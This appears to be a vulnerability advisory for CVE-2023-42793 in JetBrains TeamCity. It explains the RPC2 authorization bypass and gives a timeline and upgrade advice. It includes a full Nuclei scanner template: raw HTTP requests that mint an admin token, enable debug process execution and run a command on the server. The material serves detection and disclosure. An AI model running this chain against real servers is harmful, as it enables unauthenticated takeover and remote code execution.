Technical Details:

• TeamCity utilizes request interceptors for various actions, one of which is the authorization mechanism​.
• A specific interceptor (RequestInterceptors) checks if incoming request paths match predefined expressions (myPreHandlingDisabled)​.
• Matching paths are exempted from pre-handling, including authorization checks​.
• One of the excluded path expressions, "/**/RPC2", inadvertently allows any request ending with /RPC2 to bypass authorization​.
• The endpoint /app/rest/users/<userLocator>/tokens/RPC2 works because the endpoint's route /app/rest/users/{userLocator}/tokens/{name} accepts the path variable {name} at the end. This variable could be any string, but to achieve authentication bypass, it is set to RPC2.
• Attackers can exploit this by creating an authentication token for any user via the request POST /app/rest/users/<userLocator>/tokens/RPC2​.
• The response provides an authentication token for the specified user, granting them application access​.
• A debug API endpoint allowed arbitrary process execution when the rest.debug.processes.enable the property was set to truethe by an Admin user, followed by a config reload resulting in arbitrary code execution on the server.

Nuclei Template:

https://templates.nuclei.sh/public/CVE-2023-42793

id: CVE-2023-42793

info:
  name: JetBrains TeamCity < 2023.05.4 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
  reference:
    - https://www.jetbrains.com/privacy-security/issues-fixed/
    - https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis
    - https://www.sonarsource.com/blog/teamcity-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2023-42793
  tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive

http:
  - raw:
      - |
        DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '<token name="RPC2" creationTime'

      - type: word
        part: body_5
        words:
          - 'StdOut:{{randstr}}'

    extractors:
      - type: regex
        part: body_2
        name: token
        group: 1
        regex:
          - 'value="(.*?)"'
        internal: true

Timeline:

The vulnerability was reported on September 6, the vulnerability was confirmed on September 14, the fix was released on September 18, and the public announcement on September 21​. JetBrains acknowledged the vulnerability and released a fix in version 2023.05.4 of TeamCity.

Remediation:

Users are strongly advised to upgrade their TeamCity instance to version 2023.05.4 or later to patch this vulnerability.

References:

• JetBrains Security Issues Fixed
• Rapid7 Analysis
• SonarSource Blog on TeamCity Vulnerability
• NVD Details on CVE-2023-42793

Stay up to date with the latest Nuclei Template releases by joining our Discord. Join our mission to Democratize Security and get the monthly community newsletter delivered to your inbox.